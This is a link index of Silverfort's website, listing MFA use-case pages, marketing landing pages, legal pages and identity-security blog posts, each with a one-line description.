- [MFA for PsExec](https://www.silverfort.com/use-cases/mfa-for-psexec/): Strengthen your defenses with Silverfort’s MFA solution for secure PsExec. Silverfort provides a unique and innovative solution for MFA for...
- [MFA for Desktop](https://www.silverfort.com/use-cases/mfa-for-desktop/): Simplify security with Silverfort: Robust MFA for Desktop and Cloud, no agents required.
- [MFA for Office 365](https://www.silverfort.com/use-cases/mfa-for-office-365/): Fortifying Office 365’s Security: One Step at a Time with Silverfort’s MFA Solution. Silverfort provides a seamless and innovative solution...
- [MFA for Teams](https://www.silverfort.com/use-cases/mfa-for-teams/): Multi-factor authentication made simple for stronger team security with Silverfort. Silverfort provides a breakthrough solution for Multi-Factor Authentication (MFA) for...
- [MFA for Remote Access](https://www.silverfort.com/use-cases/mfa-for-remote-access/): Secure your remote access with Silverfort, the ultimate MFA solution.
- [MFA for Root User](https://www.silverfort.com/use-cases/mfa-for-root-user/): Elevate your security with Silverfort MFA – the ultimate solution for Root User protection.
- [MFA for Outlook](https://www.silverfort.com/use-cases/mfa-for-outlook/): Secure your Outlook with Silverfort MFA – the ultimate protection against unauthorized access. Silverfort is the perfect solution for businesses...
- [MFA for Linux](https://www.silverfort.com/use-cases/mfa-for-linux/): Strong authentication and risk-based adaptive policies to secure access to all your Linux servers and applications
- [MFA for VPN](https://www.silverfort.com/use-cases/mfa-for-vpn/): Safeguarding your VPN remote access with Agentless MFA.
- [MFA for Forticlient VPN](https://www.silverfort.com/use-cases/mfa-for-forticlient-vpn/): Secure your VPN connections with ease – with Silverfort’s MFA for Forticlient VPN.
- [MFA for Palo Alto VPN](https://www.silverfort.com/use-cases/mfa-for-palo-alto-vpn/): Uncompromising security for Palo Alto VPN with Silverfort’s seamless MFA solution. Silverfort provides a secure and seamless multi-factor authentication (MFA)...
- [MFA for Meraki VPN](https://www.silverfort.com/use-cases/mfa-for-meraki-vpn/): Enforce MFA without requiring modifications to endpoints or servers for secure remote access. Silverfort’s solution for MFA for Meraki VPN...
- [MFA for vCenter](https://www.silverfort.com/use-cases/mfa-for-vcenter/): Apply MFA protection for vCenter with Silverfort’s Advanced Solution Silverfort is a cutting-edge cybersecurity solution that provides seamless multi-factor authentication...
- [MFA for VMWare](https://www.silverfort.com/use-cases/mfa-for-vmware/): Revolutionizing MFA for VMWare: secure privileged access to vCenter, one authentication at a time. Silverfort is a cutting-edge cybersecurity solution...
- [MFA for Juniper](https://www.silverfort.com/use-cases/mfa-for-juniper/): Secure access for the most complex networks with Silverfort’s cutting-edge MFA for Juniper. Silverfort is the next-generation solution for multi-factor...
- [MFA for Jenkins](https://www.silverfort.com/use-cases/mfa-for-jenkins/): Secure your Jenkins with ease – Silverfort’s MFA solution has got you covered. Silverfort offers a revolutionary solution for implementing...
- [MFA for Jira](https://www.silverfort.com/use-cases/mfa-for-jira/): Streamline Jira authentication with Silverfort’s MFA solution – safeguard your projects and productivity.
- [MFA for Web Applications](https://www.silverfort.com/use-cases/mfa-for-web-applications/): Secure your web applications with ease – Silverfort’s MFA solution has you covered Silverfort is a cutting-edge cybersecurity solution that...
- [MFA for Servers](https://www.silverfort.com/use-cases/mfa-for-servers/): Secure your servers with ease – give Silverfort’s MFA solution a breeze. Silverfort’s solution for Multi-Factor Authentication for Servers offers...
- [MFA for VDI](https://www.silverfort.com/use-cases/mfa-for-vdi/): Secure your virtual world seamlessly with Silverfort’s MFA solution for VDI. Silverfort provides a unified MFA (multi-factor authentication) solution for...
- [MFA for Network Devices](https://www.silverfort.com/use-cases/mfa-for-network-devices/): Secure your network devices with ease, using Silverfort’s MFA solution! Networking devices including routers, switches, and firewalls are attractive targets...
- [MFA for B2B](https://www.silverfort.com/use-cases/mfa-for-b2b/): Implement secure access with Silverfort’s MFA solution – protecting your B2B network has never been easier. Silverfort offers a cutting-edge...
- [MFA for Business](https://www.silverfort.com/use-cases/mfa-for-business/): Deploy secure authentication without compromise with Silverfort’s MFA solution for businesses. Silverfort is a powerful MFA (multi-factor authentication) solution for...
- [MFA for User Interface Logins](https://www.silverfort.com/use-cases/mfa-for-user-interface-logins/): Securing your digital world with seamless MFA for every UI, powered by Silverfort.
- [MFA for Healthcare](https://www.silverfort.com/use-cases/mfa-for-healthcare/): Protecting patient data with peace of mind – Silverfort’s seamless MFA solution for healthcare. Silverfort provides a powerful authentication platform...
- [MFA for AWS Workspaces](https://www.silverfort.com/use-cases/mfa-for-aws-workspaces/): Secure AWS Workspaces with ease – Silverfort’s MFA solution has got you covered! Silverfort provides a revolutionary Multi-Factor Authentication (MFA)...
- [Silverfort for Travelers customers](https://www.silverfort.com/silverfort-for-travelers-customers/): Welcome Travelers Cyber Clients! Silverfort empowers organizations to secure their environments from identity threats such as account takeover, lateral movement...
- [LP: Comply with the New Cyber Security Insurance Requirements – THN EM July 2023](https://www.silverfort.com/comply-with-the-new-cyber-ins-requirements-thn-em-jul23/): Everyone knows the value of cyber security insurance, but keeping up with the requirements of cyber security insurance plans can...
- [Microsoft Partner Page](https://www.silverfort.com/partners/microsoft/): Silverfort & Microsoft Silverfort and Microsoft’s product integrations help organizations to consolidate their IAM across hybrid environments, extend identity protection...
- [LP: Silverfort for Alliant customers](https://www.silverfort.com/silverfort-for-alliant-customers/): Silverfort empowers organizations to secure their environments from identity threats such as account takeover, lateral movement and ransomware spread. Our...
- [LP: Silverfort for INSUREtrust customers](https://www.silverfort.com/silverfort-for-insuretrust-customers/): Silverfort empowers organizations to secure their environments from identity threats such as account takeover, lateral movement and ransomware spread. Our...
- [LP: The Dark Side of Ransomware Protection – PPC](https://www.silverfort.com/the-dark-side-of-ransomware-protection-ppc/): Can you block lateral movement? Ransomware attacks are a top concern for enterprise security stakeholders, particularly the pairing of ransomware...
- [LP: Find a Partner LP](https://www.silverfort.com/find-a-partner/): We are all about matching you with the right partner. We’ll find your perfect match. Just complete a few questions,...
- [Request a demo - DE](https://www.silverfort.com/request-a-demo-de/): What is your identity protection challenge? Fill out the form below and we’ll contact you to schedule an online or...
- [Request a demo - FR](https://www.silverfort.com/request-a-demo-fr/): What is your identity protection challenge? Fill out the form below and we’ll contact you to schedule an online or...
- [Request a Demo LP-MFA-AD-FR](https://www.silverfort.com/request-a-demo-lp-mfa-ad-fr/): Fill out this form to arrange a demo. If you have an Active Directory, it is likely that many authentications...
- [Silverfort for At-Bay Customers](https://www.silverfort.com/silverfort-for-at-bay-customers/): Welcome At-Bay Cyber Clients! Silverfort empowers organizations to secure their environments from identity threats such as account takeover, lateral movement...
- [LP: Comply with the New Cyber Security Insurance Requirements – PPC](https://www.silverfort.com/comply-with-the-new-cyber-insurance-requirements-ppc/): Everyone knows the value of cyber security insurance, but keeping up with the requirements of cyber security insurance plans can...
- [Silverfort for AIG customers](https://www.silverfort.com/silverfort-for-aig-clients/): Silverfort empowers organizations to secure their environments from identity threats such as account takeover, lateral movement and ransomware spread. Our...
- [LP: Re-Evaluate Your MFA: Are You as Protected as You Should Be?](https://www.silverfort.com/re-evaluate-your-mfa-are-you-as-protected-as-you-should-be/): Multi-factor Authentication (MFA) protection is a key component in any organization’s security stack, but ultimately, only as strong as its...
- [LP: Case Study: Leading Manufacturer Averted Lateral Movement](https://www.silverfort.com/leading-manufacturer-averts-lateral-movement/): The manufacturing industry has become a ripe target for cyber-attacks over the last decade. Whether due to vulnerable hybrid environments,...
- [LP: 4 Steps To Comprehensive Service Account Security – THN](https://www.silverfort.com/4-steps-to-comprehensive-service-account-security-thn/): There are countless service accounts in any given organization and today, the number of these non-human accounts, and the number...
- [LP: Webinar on Demand - Can You Block Lateral Movement in Real Time?](https://www.silverfort.com/webinar-on-demand-can-you-block-lateral-movement-in-real-time/): https://www.youtube.com/watch?v=SgyVeXoG-cc
- [LP: Cyber Insurance Free Assessment](https://www.silverfort.com/cyber-insurance-free-assessment/): GET A FREE IDENTITY SECURITY ASSESSMENT Identify the MFA and privileged access protection gaps you must resolve to qualify for...
- [LP: Hybrid IAM Azure eBook LP DE](https://www.silverfort.com/lp-hybrid-iam-azure-ebook-de/): Win against advanced threat actors with comprehensive least-privilege access across all resources. Identity-based attacks have grown in sophistication and scale....
- [LP: Cyber Insurance eBook LP DE](https://www.silverfort.com/lp-cyber-insurance-ebook-de/): Everyone knows the value of cyber insurance, but it can be hard to keep up with cyber insurance requirements....
- [LP: 4-steps-to-comprehensive-service-account-security LP DE](https://www.silverfort.com/4-steps-to-comprehensive-service-account-security-lp-de/): Every organization has countless service accounts, and the number of these non-human accounts and of the applications that depend on them...
- [Request a Demo LP-MFA-FR](https://www.silverfort.com/request-a-demo-lp-mfa-fr/): Fill out this form to arrange a demo. If you have an Active Directory, it is likely that many authentications...
- [LP: hybrid IAM Azure eBook FR](https://www.silverfort.com/lp-hybrid-iam-consolidation-azure-ad-fr/): Win against attackers by putting in place strengthened, generalized access control over AD authentications...
- [LP: 4-steps-to-comprehensive-service-account-security FR](https://www.silverfort.com/lp-4-steps-to-comprehensive-service-account-security-fr/): Service accounts are now widely used in enterprises. The number of applications that depend on them grows day...
- [Request a Demo LP-CI](https://www.silverfort.com/request-a-demo-lp-ci/): Fill out the form to schedule a demo. Need to apply MFA to privileged accounts or legacy applications to comply...
- [Request a Demo LP-MFA](https://www.silverfort.com/request-a-demo-lp-mfa/): Fill out the form to schedule a demo. If you have MFA but your legacy apps, command line interfaces or...
- [Thank you page - why unified iam visibility control is key for zero trust](https://www.silverfort.com/thank-you-page-why-unified-iam-visibility-control-is-key-for-zero-trust/)
- [Thank You for Downloading Service Accounts Ebook](https://www.silverfort.com/thank-you-for-downloading-service-accounts-ebook/)
- [Thank You For Downloading Re Evaluate Your Mfa Protection Ebook](https://www.silverfort.com/thank-you-for-downloading-re-evaluate-your-mfa-protection-ebook/)
- [Thank You For Downloading Rethinking Ransomware Protection Ebook](https://www.silverfort.com/thank-you-for-downloading-rethinking-ransomware-protection-ebook/)
- [Thank You For Downloading Silverfort Adaptive Authentication White Paper](https://www.silverfort.com/thank-you-for-downloading-silverfort-adaptive-authentication-white-paper/)
- [Thank You For Downloading Protecting The Unprotectable White Paper](https://www.silverfort.com/thank-you-for-downloading-protecting-the-unprotectable-white-paper/)
- [Thank you page - mfa meet the ultimate game changer in ransomware protection](https://www.silverfort.com/thank-you-page-mfa-meet-the-ultimate-game-changer-in-ransomware-protection/)
- [Thank you page - journey to identity centric zero trust security wod](https://www.silverfort.com/thank-you-page-journey-to-identity-centric-zero-trust-security-wod/)
- [Request a Demo LP](https://www.silverfort.com/request-a-demo-lp/): Fill out the form to schedule a demo. Here’s what happens when you speak with us:
- [LEGAL: Cookies Policy](https://www.silverfort.com/company/cookies-policy/): We use cookies and similar files or technologies to automatically collect and store information about your computer, device, and Site...
- [LEGAL: Silverfort Product License Agreement](https://www.silverfort.com/company/silverfort-software-license-agreement-01-21/): BY INSTALLING, ACCESSING AND/OR USING THE SILVERFORT AUTHENTICATION PLATFORM SOFTWARE (“SOFTWARE”), YOU EXPRESSLY ACKNOWLEDGE AND AGREE THAT YOU, OR THE...
- [Enrolling Users](https://www.silverfort.com/enrolling-users/): Installing Silverfort Mobile App Configuring Silverfort Mobile App Once you have installed the mobile app, you need to configure it...
- [Logo.png(170x38)](https://www.silverfort.com/logo-png/)
- [USE CASE: Cyber Insurance Compliance](https://www.silverfort.com/use-cases/cyber-insurance-compliance/): Cyber insurance compliance Coverage is complete. Compliance is built in. Meet and exceed the extended MFA requirements of cyber insurance...
- [USE CASE: Zero Trust Security](https://www.silverfort.com/use-cases/zero-trust-security/): Identity Zero Trust Trust made easy. Bring zero trust security to the identity control plane with adaptive least-privilege access policies...
- [CAPABILITIES: Universal MFA](https://www.silverfort.com/platform/universal-multi-factor-authentication/): Universal Multi-Factor Authentication Push MFA beyond limits. Protect everything. When we say universal, we mean it. Extend MFA protection to...
- [USE CASE: Ransomware Protection](https://www.silverfort.com/use-cases/ransomware-protection/): Lateral movement & ransomware protection Stop attacks from spreading in real time. Defend against ransomware attacks and put a stop...
- [LEGAL: Terms of Use](https://www.silverfort.com/terms-of-use/): Welcome to www.silverfort.com (together with its subdomains, Content, Marks and services, the “Site”). Please read the following Terms...
- [LEGAL: Data Privacy Framework ("DPF") Program Notice](https://www.silverfort.com/silverfort-dpf-notice/): Effective: September, 2024 This DPF notice (“Notice”) governs Silverfort Inc. (“Silverfort”, “We” or “Our”) participation in the EU-U.S. DPF...
- [Careers](https://www.silverfort.com/careers/): Careers with Silverfort Join our team. We’re always looking for the best talent to join our award-winning team. Discover what...
- [Contact us](https://www.silverfort.com/contact/): contact us Let’s connect We’re here to help. Talk to sales Looking for a complete end-to-end identity security solution? You’ve...
- [Use Cases](https://www.silverfort.com/use-cases/)
- [OLD USE CASE: Service Account Protection](https://www.silverfort.com/use-cases/securing-service-accounts/): Discover, monitor and protect service accounts (M2M access) with fully automated visibility, risk analysis and adaptive Zero Trust policies, without...
- [Request a demo](https://www.silverfort.com/request-a-demo/): Secure every identity. Stop identity threats—inline. We found a way. From legacy to cloud, discover and protect every identity. See...
- [Blog](https://www.silverfort.com/blog/)
- [About Us](https://www.silverfort.com/company/): About Us Taking identity security where it has never gone before. Silverfort secures every dimension of identity. We break down...
- [Partner with Silverfort](https://www.silverfort.com/partners/): Partner with Silverfort Partnerships are key to our continued success and growth. Our partner network includes leading value-added distributors and...
- [Platform](https://www.silverfort.com/platform/): The Silverfort Identity Security Platform Secure every dimension of identity. Leave no one behind. Protect workforce users, privileged users, third...

---

## Posts

- [The future of privileged access is vault-free](https://www.silverfort.com/blog/the-future-of-privileged-access-is-vault-free/): The cybersecurity world was jolted by the recent announcement that Palo Alto Networks will acquire CyberArk in a landmark deal...
- [ESG research uncovers 70% of enterprises recognize the need to consolidate their identity security tool stack](https://www.silverfort.com/blog/esg-research-reveals-importance-of-identity-security-consolidation/): Read the latest identity security research from Enterprise Strategy Group (ESG), unveiling key trends and investment plans.
- [Stopping Golden dMSA attacks before they start](https://www.silverfort.com/blog/stopping-golden-dmsa-attacks-before-they-start/): Microsoft’s recent research spotlights a dangerous post-exploitation technique called Golden dMSA. This new attack method abuses SYSTEM-level access on domain...
- [Into the Spider-verse: Qantas, Scattered Spider, and what Australian teams should learn](https://www.silverfort.com/blog/into-the-spider-verse-qantas-scattered-spider-and-what-australian-teams-should-learn/): As both a Qantas Frequent Flyer and a cybersecurity professional based in Sydney, I felt the impact of the airline’s...
- [What the future holds for identity security after CyberArk's acquisition by Palo Alto Networks](https://www.silverfort.com/blog/what-the-future-holds-for-identity-security-after-cyberarks-acquisition-by-palo-alto-networks/): Last week, Palo Alto Networks announced its intention to acquire CyberArk for $25B. This is Palo Alto Networks’ first move...
- [Service Accounts: From Security Measure to Silent Foothold](https://www.silverfort.com/blog/service-accounts-from-security-measure-to-silent-foothold/): Microsoft’s built-in password rotation mechanism is designed to protect on-premises Non-Human Identities (NHIs), such as machine accounts in Active Directory...
- [Introducing the Silverfort MCP Server: Where AI Agents Meet Identity Security](https://www.silverfort.com/blog/introducing-the-silverfort-mcp-server-where-ai-agents-meet-identity-security/): The future of identity-aware AI starts now AI agents are becoming integral to enterprise workflows, from analyzing risk to making...
- [How to mitigate active exploitation of Microsoft SharePoint vulnerabilities](https://www.silverfort.com/blog/how-to-mitigate-active-exploitation-of-microsoft-sharepoint-vulnerabilities/): A recent Microsoft security blog post highlights active exploitation of on-premises SharePoint vulnerabilities, where attackers are: Patching isn’t always immediate—so...
- [6 capabilities every identity security platform must have](https://www.silverfort.com/blog/six-capabilities-every-identity-security-platform-must-have/): Identity has changed – in a world where business occurs across systems, time zones, and even between humans and non-humans,...
- [What’s the difference between NHI and AI agents—and why it matters](https://www.silverfort.com/blog/whats-the-difference-between-nhi-and-ai-agents-and-why-it-matters/): As AI capabilities evolve, the concepts of non-human identity (NHI) and AI agent are showing up increasingly in our daily...
- [Non-human identities and zero trust: The next evolution in identity security](https://www.silverfort.com/blog/non-human-identities-and-zero-trust-the-next-evolution-in-identity-security/): As enterprises push forward with digital transformation, a new and often overlooked attack surface has emerged: non-human identities (NHIs). NHIs...
- [NOTLogon: How a Low-Privilege Machine Can DoS Your Domain](https://www.silverfort.com/blog/notlogon-how-a-low-privilege-machine-can-dos-your-domain/): Silverfort discovers Active Directory Denial-of-Service (DoS) vulnerability, known as NOTLogon (CVE-2025-47978)
- [Introducing AI Agent Security: Treat your AI agents as identities for accountability, inline protection, and accelerated innovation](https://www.silverfort.com/blog/secure-your-ai-agents-with-silverforts-identity-first-innovation/): As organizations hurry to embrace AI and its many benefits, one challenge weighs heavily on CISO and security teams’ minds:...
- [Silverfort Is Now the Only IMDA-Accredited Identity Security & Threat Detection Platform for Cloud and On-Prem](https://www.silverfort.com/blog/silverfort-is-now-the-only-imda-accredited-identity-security-platform-for-cloud-and-on-prem/): With the acquisition of Rezonate’s cloud-native capabilities and the launch of the new cloud NHI security capabilities, Silverfort is now...
- [Fireside Chat with Silverfort President and Chief Revenue Officer Howard Greenfield](https://www.silverfort.com/blog/fireside-chat-with-president-and-cro-howard-greenfield/): Cybersecurity and identity industry veteran Howard Greenfield joins Silverfort as President & CRO.
- [What you don’t know about your identities could be your biggest risk?](https://www.silverfort.com/blog/what-you-dont-know-about-your-identities-could-be-your-biggest-risk/): Have you ever considered that your biggest security risk might come from an account no one remembers exists? Identity has...
- [Beyond the hype: The hidden security risks of AI agents and MCP](https://www.silverfort.com/blog/beyond-the-hype-the-hidden-security-risks-of-ai-agents-and-mcp/): As AI rapidly evolves from a novelty to a necessity, businesses across every industry are feeling the pressure to integrate...
- [Insecurity in the shadows: The data that proves why non-human identities are a cybersecurity priority](https://www.silverfort.com/blog/insecurity-in-the-shadows-the-data-that-proves-why-non-human-identities-are-a-cybersecurity-priority/): Most security programs are laser-focused on human users, including employees, contractors, and third parties. But there’s a parallel universe growing...
- [Loss control services: One of the most underused tools for reducing identity security risk](https://www.silverfort.com/blog/loss-control-services-one-of-the-most-underused-tools-for-reducing-identity-security-risk/): Cyber insurers are offering tools that could significantly reduce your identity risk—but most organizations aren’t using them. One of the...
- [Defending retail against identity threats: What you can do today](https://www.silverfort.com/blog/defending-retail-against-identity-threats-what-you-can-do-today/): In recent weeks, several major UK retail brands, including M&S, Harrods, and the Co-operative Group, have suffered significant cyberattacks...
- [Uncovering the hidden threat: Securing cloud non-human identities with Silverfort](https://www.silverfort.com/blog/uncovering-the-hidden-threat-securing-cloud-non-human-identities-with-silverfort/): As innovation in identity security evolves by the day, so does the attack surface. Nothing is growing faster than cloud-based...
- [The silent explosion of non-human identities: The need for an end-to-end approach](https://www.silverfort.com/blog/introducing-non-human-identity-security-nhi/): Today, Silverfort expands its deep identity protection to the cloud—bringing unmatched visibility and control to non-human identities (NHIs) across cloud...
- [Enforcing MFA for Windows Logon: Local endpoints, virtual desktops and servers](https://www.silverfort.com/blog/enforcing-mfa-for-windows-logon-local-endpoints-virtual-desktops-and-servers/): Do you know how many Windows Logon authentications happen on a daily basis? Hundreds of thousands of employees globally use...
- [The inevitable decline of traditional PAM](https://www.silverfort.com/blog/the-inevitable-decline-of-traditional-pam/): Traditional PAM solutions have dominated the market for years—but the truth is, you probably don’t need one to cover the...
- [Reflections from the identity frontline](https://www.silverfort.com/blog/reflections-from-the-identity-frontline/): Over the last eight years, I’ve had the unique challenge of building and maturing an Identity and Access Management (IAM)...
- ["It's the identity, stupid": A conversation with identity security expert Abbas Kudrati](https://www.silverfort.com/blog/its-the-identity-stupid-a-conversation-with-identity-security-expert-abbas-kudrati/): I sat down with Abbas Kudrati, APAC Chief Identity Security Advisor at Silverfort, to discuss the most pressing identity security...
- [Who governs the governance? Why the least privilege model is key to securing IGA](https://www.silverfort.com/blog/who-governs-the-governance-why-the-least-privilege-model-is-key-to-securing-iga/): IGA tools allow organizations to manage who has access to what. IGA’s primary focus is on business outcomes and operational...
- [Silverfort named a Fast Company Most Innovative Company](https://www.silverfort.com/blog/silverfort-named-a-fast-company-most-innovative-company/): The World’s Most Innovative Companies Award by Fast Company is the definitive source for recognizing organizations that transform industries and...
- [Local accounts unlocked: how Silverfort empowers security teams with end-to-end visibility](https://www.silverfort.com/blog/local-accounts-unlocked-how-silverfort-empowers-security-teams-with-end-to-end-visibility/): Have you ever thought how many accounts in your environment operate outside of your visibility and control? One of the...
- [How PAS and PAM Work Together to Protect Privileged Admin Accounts](https://www.silverfort.com/blog/how-pas-and-pam-work-together-to-protect-privileged-admin-credentials/): Admin accounts are undoubtedly the ultimate prize for attackers when it comes to privileged users. These accounts are the most...
- [Unveiling Silverfort’s New Brand—Identity Security Done Right](https://www.silverfort.com/blog/unveiling-silverforts-new-brand-identity-security-done-right/): No more patchworks and one-offs—break down the traditional identity silos and secure without limits.
- [Identity security explained in the Belgian NIS2 law](https://www.silverfort.com/blog/identity-security-explained-in-the-belgian-nis2-law/): Belgium was the first European country to transpose NIS2 into national law, in April, through its “NIS2 law”. This set...
- [A Critical Step Forward for Healthcare: Breaking Down the Proposed HIPAA Security Rule Framework Updates](https://www.silverfort.com/blog/a-critical-step-forward-for-healthcare-breaking-down-the-proposed-hipaa-security-rule-framework-updates/): Healthcare is one of the most targeted sectors by malicious actors, with the number of breaches growing consistently year on...
- [Microsoft Teams and Silverfort: Bridging Authentication and Enhancing Identity Incident Visibility](https://www.silverfort.com/blog/microsoft-teams-and-silverfort-bridging-authentication-and-enhancing-identity-incident-visibility/): While hybrid environments are the new norm, they bring with them a unique set of security challenges, like fragmented systems,...
- [Navigating the Five Eyes Alliance's Guide to Detecting and Mitigating Active Directory Compromises](https://www.silverfort.com/blog/navigating-the-five-eyes-alliances-guide-to-detecting-and-mitigating-active-directory-compromises/): The Five Eyes Alliance, led by the Australian Signals Directorate (ASD), recently released a key document titled Detecting and Mitigating...
- [If you think you blocked NTLMv1 in your org, think again](https://www.silverfort.com/blog/ntlmv1-bypass-in-active-directory-technical-deep-dive/): Silverfort discovers that an Active Directory Group Policy designed to disable NTLMv1 is easily bypassed due to a simple misconfiguration, allowing...
- [The Treasury Department cyberattack: Key insights on BeyondTrust remote support software hack](https://www.silverfort.com/blog/the-treasury-department-cyberattack-key-insights-on-beyondtrust-remote-support-software-hack/): TL;DR *** In December 2024, the U.S. Department of the Treasury fell victim to a sophisticated cyberattack orchestrated by...
- [Introducing the Silverfort Integration Hub: A New Era for Hybrid and Cloud Identity Security](https://www.silverfort.com/blog/introducing-the-silverfort-integration-hub-a-new-era-for-hybrid-and-cloud-identity-security/): Silverfort is excited to announce the launch of our Integration Hub, a Silverfort cloud service that seamlessly connects your Silverfort...
- [Secure your Privileged Accounts with Silverfort](https://www.silverfort.com/blog/secure-your-privileged-accounts-with-silverfort/): Due to the distinct security blindspots associated with PAM solutions, protecting privileged accounts has become a daunting task for most...
- [Privileged access security reimagined: What did we aim for with our new product?](https://www.silverfort.com/blog/silverfort-launches-privileged-access-security-to-solve-gaps-left-by-pam/): Today we’re proud to introduce another important milestone in Silverfort’s journey to build the world’s leading unified identity security platform....
- [How FIDO2 Enhances Identity Security for Shift-Based Shared Accounts in Retail and Manufacturing](https://www.silverfort.com/blog/how-fido2-enhances-identity-security-for-shift-based-shared-accounts-in-retail-and-manufacturing/): In industries that require a shift-based workforce, like retail and manufacturing, sharing user accounts is a common solution for employees who...
- [Enhancing Cyber Security with Silverfort: Addressing Key Insights from the ASD ACSC Annual Cyber Threat Report 2023-2024](https://www.silverfort.com/blog/enhancing-cyber-security-with-silverfort-addressing-key-insights-from-the-asd-acsc-annual-cyber-threat-report-2023-2024/): Over the past year, the Australian Cyber Security Centre (ACSC) received nearly 90,000 cybercrime reports and more than 36,700 calls...
- [Do you have all the identity security signals and controls to make SSF/CAEP work?](https://www.silverfort.com/blog/do-you-have-all-the-identity-security-signals-and-controls-to-make-ssf-caep-work/): Every day, your Active Directory processes millions of authentication requests, permission changes and access events. Hidden within this flood of...
- [Rezonate is now part of Silverfort: Building the world’s first end-to-end identity security platform](https://www.silverfort.com/blog/silverfort-acquires-rezonate-cloud-identity-security/): We’re excited to welcome Rezonate to the Silverfort team, expanding our identity security platform deeper into cloud environments and breaking...
- [New Cybersecurity Regulations in New York: What General Hospitals Must Do to Stay Compliant](https://www.silverfort.com/blog/new-cybersecurity-regulations-in-new-york-what-general-hospitals-must-do-to-stay-compliant/): Every general hospital in New York State is now experiencing a significant shift in their cybersecurity requirements. As of October...
- [Exploiting Weaknesses in Entra ID Account Synchronization to Compromise the On-Prem Environment](https://www.silverfort.com/blog/exploiting-weaknesses-in-entra-id-account-synchronization-to-compromise-the-on-prem-environment/): Active Directory (AD) is a Microsoft product designed to assist network administrators in managing user permissions within an organization. It...
- [Identity Under Siege: Why Attackers Are Targeting MFA Gaps and How to Respond](https://www.silverfort.com/blog/identity-under-siege-why-attackers-are-targeting-mfa-gaps-and-how-to-respond/): Cyberattacks are becoming more frequent and sophisticated, with identity as the main target for threat actors and ransomware as a...
- [Navigating CMMC Compliance: How Silverfort Can Streamline Your Journey](https://www.silverfort.com/blog/navigating-cmmc-compliance-how-silverfort-can-streamline-your-journey/): As the threat landscape evolves, attackers are setting their sights on organizations that work closely with critical national infrastructure and...
- [ITDR and ISPM: The Best of Both Worlds](https://www.silverfort.com/blog/itdr-and-ispm-the-best-of-both-worlds/): At first glance, Identity Threat Detection and Response (ITDR) and Identity Security Posture Management (ISPM) sound like two names for...
- [Hidden Threats: Why Privileged Access Security Should Be Your Top Priority](https://www.silverfort.com/blog/hidden-threats-why-privileged-access-security-should-be-your-top-priority/): It’s no secret that privileged accounts can be an open door to security threats. Yet managing privileged access––not protecting the...
- [Introducing Silverfort's Identity-First Incident Response: Block Lateral Movement, Detect Compromised Accounts and Accelerate Recovery](https://www.silverfort.com/blog/introducing-silverforts-identity-first-incident-response-block-lateral-movement-detect-compromised-accounts-and-accelerate-recovery/): Today I’m excited to announce Silverfort’s Identity-First Incident Response (IR) Solution, which flips the script on the traditional IR process...
- [How to secure “automatic processes” under the French transposition of NIS2?](https://www.silverfort.com/blog/comment-securiser-les-processus-automatiques-selon-la-transposition-francaise-de-nis2/): The ANSSI reference framework published by MagIT for entities subject to the NIS2 directive in France mentions in...
- [Service Account Security: Why Automation is the Key to Effective Enforcement](https://www.silverfort.com/blog/service-account-security-why-automation-is-the-key-to-effective-enforcement/): Cybersecurity starts with one major principle: “You cannot protect what you don’t know”. This is true for assets like endpoints,...
- [How Organizations Can Align with NIST’s Cybersecurity Framework Version 2.0](https://www.silverfort.com/blog/how-silverfort-can-help-organizations-align-with-nists-cybersecurity-framework-version-2-0/): Applying security controls across an organization’s environment must be a top priority for every organization, regardless of its size, sector,...
- [Keeping Up with the Credentials: The Evolving Landscape of Ransomware in 2024](https://www.silverfort.com/blog/keeping-up-with-the-credentials-the-evolving-landscape-of-ransomware-in-2024/): The first half of 2024 has seen some of the largest breaches in recent years. Their common denominator? Compromised credentials...
- [The End of an Era: Understanding the Security Risks of NTLM](https://www.silverfort.com/blog/understanding-the-security-risks-of-ntlm/): In October 2023, Microsoft made a pivotal announcement that signaled the beginning of the end for NTLM, including all its...
- [Shining the Spotlight on the Rising Risks of Non-Human Identities](https://www.silverfort.com/blog/shining-the-spotlight-on-the-rising-risks-of-non-human-identities/): Active Directory Service Accounts: A closer look at one of the most common NHIs and their role in lateral movement...
- [NTLM Deprecation is Giving Us XP EOL Flashbacks: Are You Protected?](https://www.silverfort.com/blog/ntlm-deprecation-is-giving-us-xp-eol-flashbacks-are-you-protected/): Microsoft recently announced the deprecation of the NTLM protocol for Windows clients. This falls in line with Microsoft’s encouragement to move...
- [Identity Security Is the Key to Managing Manufacturers’ Supply Chain Cyber Risk](https://www.silverfort.com/blog/identity-security-is-the-key-to-managing-manufacturers-supply-chain-cyber-risk/): What’s the weakest link in a manufacturer’s security architecture? One of the common answers is ‘the one you can’t control’,...
- [Knowledge is Power: The Importance of Identity Risk Assessment](https://www.silverfort.com/blog/knowledge-is-power-the-importance-of-identity-risk-assessment/): Over 80% of organizations have experienced an identity-related breach that involved compromised credentials. Compromised credentials are one of the most...
- [French transposition of the NIS2 directive: in terms of identity, what measures are expected?](https://www.silverfort.com/blog/french-transposition-of-the-nis2-directive/): ANSSI has been working for several months on the transposition of the European NIS2 directive into French law. Recently, a first draft...
- [AD Tiering: Protecting Admin Access to Tiers 1 and 2](https://www.silverfort.com/blog/ad-tiering-protecting-admin-access-to-tiers-1-and-2/): As the identity attack surface continues to evolve with new methods of compromising organizations, the need to secure an organization’s...
- [AD Tiering Made Simple(r)](https://www.silverfort.com/blog/ad-tiering-made-simpler/): Active Directory (AD) tiering is nothing new for organizations that need the most secure IT environments, like those in the...
- [Beyond Passwords: Why Trusting Password Hygiene Isn't Enough](https://www.silverfort.com/blog/beyond-passwords-why-trusting-password-hygiene-isnt-enough/): Let’s discuss passwords and identity security. By entering a password that only you know, you are in theory “proving” to...
- [Treating Identity Security as a Business Investment](https://www.silverfort.com/blog/treating-identity-security-as-a-business-investment/): Security decisions directly affect employees, customers, shareholders, and business continuity. As the role of the Chief Information Security Officer (CISO)...
- [Navigating Retail: Overcoming the Top 3 Identity Security Challenges](https://www.silverfort.com/blog/navigating-retail-overcoming-the-top-identity-security-challenges/): As retailers compete in an increasingly competitive marketplace, they invest a great deal of resources in becoming household names. But...
- [Unlocking HIPAA Compliance: Navigating Access Control and MFA Guidelines](https://www.silverfort.com/blog/unlocking-hipaa-compliance-navigating-access-control-and-mfa-guidelines/): As technology continues to revolutionize healthcare operations, protecting patient data has never been more challenging. In the ongoing struggle against...
- [Identity Security for Oil and Gas Environments](https://www.silverfort.com/blog/identity-security-for-oil-and-gas/): Identity-based threats account for a staggering 80% of breaches, positioning identity security as the foundational element of cybersecurity in the...
